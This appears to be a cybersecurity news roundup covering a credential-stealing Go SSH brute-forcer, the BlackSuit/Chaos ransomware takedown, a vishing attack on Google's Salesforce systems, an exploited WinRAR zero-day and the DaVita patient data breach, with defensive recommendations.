Go Module Disguised as SSH Brute Forcer Steals Credentials via Telegram
Researchers have identified a malicious Go module on GitHub that masqueraded as a penetration testing tool but covertly exfiltrated harvested credentials to a Telegram bot. The tool’s distribution leveraged open-source community trust, increasing its potential reach within developer and security communities.
Background and Discovery
The module, named “Golang random IP SSH brute force,” appeared to offer brute-forcing of SSH credentials across random IPv4 addresses. Unlike legitimate offensive security tools, this module embedded credential exfiltration functionality that would send successful username and password combinations, along with their associated IP addresses, to a hardcoded Telegram bot operated by an unidentified threat actor. The primary distribution method was a now-discontinued GitHub account, from which unsuspecting users could download and run the tool, believing it to be benign.
Technical Mechanics
This Go module actively scanned random IPv4 addresses for open SSH services (specifically on TCP port 22). Using a bundled list of usernames and passwords, it conducted brute-force attempts to gain unauthorized access. Whenever successful, it immediately transmitted the credentials to the attacker’s Telegram channel. The module highlighted a trend of increasingly sophisticated supply chain attacks, where malicious actors seed widely used programming environments and repositories with backdoored packages targeting operational security lapses.
Security Implications
Such malicious modules underscore the dangers inherent in downloading and executing unverified code, particularly from unofficial or little-known sources. Threat actors not only gain access to breached systems but also assemble credential databases for broader attack automation, credential stuffing campaigns, or access resale. The use of Telegram as an exfiltration medium signifies a shift toward leveraging mainstream encrypted messaging platforms as covert command-and-control channels.
Recommendations
Security professionals and developers should verify the authenticity of open-source tools before usage, continuously monitor for suspicious outbound network traffic to Telegram and similar services, and enforce strict controls around the use of offensive security tooling in production environments. Regular code audits and restricting administrative privileges for such operations can mitigate the risks of credential leakage and supply chain tampering.
Disruption of BlackSuit and Chaos Ransomware Infrastructures
A coordinated international law enforcement effort has dismantled the core infrastructure of the BlackSuit ransomware operation and seized millions in cryptocurrency from affiliates linked to related groups such as Chaos ransomware. These actions reflect intensified global momentum against ransomware and high-profile cyber extortion.
BlackSuit Takedown
Authorities from the U.S., U.K., Germany, the Netherlands, Ukraine, and other countries, supported by cybersecurity experts, seized the BlackSuit ransomware group’s data leak sites and negotiation portals. The operation involved a combination of technical interventions and on-the-ground investigative coordination to physically and digitally remove the infrastructure used for publishing stolen victim data and facilitating ransom payments.
Financial Seizures and Affiliate Disruption
In parallel, FBI agents seized over $2.3 million in Bitcoin from a wallet controlled by an affiliate of the Chaos ransomware group, which researchers believe is a rebranded iteration of BlackSuit. The wallet was linked to multiple extortion incidents, particularly targeting Texas-based organizations earlier in the year. Forensic blockchain analysis was crucial in tracking ransomware proceeds, eventually leading to a successful civil forfeiture action.
Technical Connection and Attribution
Technical research revealed significant overlaps in encryption routines and operational tooling between Chaos and BlackSuit, indicating lineage from the notorious Conti ransomware family. This demonstrates how ransomware groups consistently recycle infrastructure, techniques, and personnel following law enforcement pressure, leading to “rebranding” cycles rather than complete dissolution.
Operational and Strategic Implications
The success of these takedowns highlights the benefits of international public-private collaboration and the value of technical guidance from security researchers working alongside law enforcement. However, the persistence of ransomware, despite these disruptions, underscores the need for ongoing vigilance, better incident response planning, and defensive investment in detection and attribution capabilities.
Malicious Vishing Attack on Google Targets Salesforce Systems
UNC6040, an advanced criminal group, executed a sophisticated vishing (voice phishing) attack against Google to compromise its Salesforce environments. The campaign employed direct phone social engineering combined with technical payloads for persistent access.
Attack Vector and Social Engineering Tactics
The attackers impersonated legitimate Google IT personnel via targeted phone calls to employees with privileged Salesforce access. Victims were persuaded, under plausible pretexts, to install a custom application. This application, delivered during the active social engineering session, enabled the attackers to exfiltrate information and establish remote access.
Custom Python Tooling and Operational Security Measures
UNC6040 utilized bespoke Python scripts designed to evade detection and frustrate post-incident forensic analysis. These tools obfuscated their activity and hindered attribution by making the origin and flow of data less tractable.
Impact and Mitigation Outcome
Google’s rapid detection and incident response contained the breach, limiting exposure to information already publicly available, according to company statements. The attack illustrates the convergence of human social engineering with technical exploitation—an area that continues to challenge even the most mature security organizations.
WinRAR Zero-Day Actively Exploited Prior to Security Patch
WinRAR users were recently exposed to a severe zero-day vulnerability that allowed attackers to execute arbitrary code by tricking victims into opening specially crafted archive files. The exploit was actively traded and used before the vendor issued a security update.
Nature of the Vulnerability
The bug permitted execution of attacker-controlled code whenever a user processed a malicious WinRAR archive. While detailed technical specifics remain private due to ongoing mitigative efforts, it is known that the flaw was easy to trigger and required minimal interaction—usually opening a compromised file circulated via email or download.
Dark Web Trade and Exploitation Timeline
Intelligence reports indicated cybercriminal forums, particularly on the Russian dark web, were marketing the exploit as early as July. This rapid underground commodification enabled widespread exploitation before most users received or applied the vendor’s security patch.
Patching and User Guidance
WinRAR’s development team moved quickly to issue a fix in the latest release. Users are strongly encouraged to update immediately, as earlier versions remain vulnerable to effortless compromise. The incident demonstrates the ongoing risk posed by legacy, widely-deployed utility software and the importance of timely security updates.
DaVita Dialysis Provider Suffers Massive Data Breach
DaVita, a major U.S. kidney dialysis provider, reported a substantial data breach in which nearly one million patients’ sensitive medical and financial records were compromised, including Social Security numbers and clinical information. The attack is attributed to the Interlock ransomware group.
Incident Overview and Timeline
The intrusion occurred between March 24 and April 12, 2025, targeting DaVita’s patient labs database. The attack began as a ransomware deployment but quickly shifted to data theft, with confirmation of unauthorized access to financial, clinical, and personal identifiers for 915,952 individuals.
Attack Attribution and Ransomware Group Tactics
The Interlock ransomware group claimed responsibility, boasting of stealing 1.5TB of sensitive data and providing samples to demonstrate access. DaVita only discovered the full scope of the breach weeks later, after attackers published select records online. Remediation and mitigation, bolstered by third-party experts, cost DaVita over $13 million and included both administrative and direct patient care expenses.
Regulatory and Customer Response
Following notification laws and best practices, DaVita informed all affected individuals and offered free credit monitoring. The breach contributes to an ongoing surge in healthcare sector attacks, despite evidence of slower ransomware growth rates in the industry overall for 2025.